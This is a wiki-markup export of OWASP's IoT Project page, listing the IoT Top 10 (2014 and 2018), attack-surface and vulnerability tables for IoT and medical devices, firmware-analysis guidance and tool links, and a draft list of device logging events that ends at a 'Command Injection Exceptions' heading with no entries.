* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
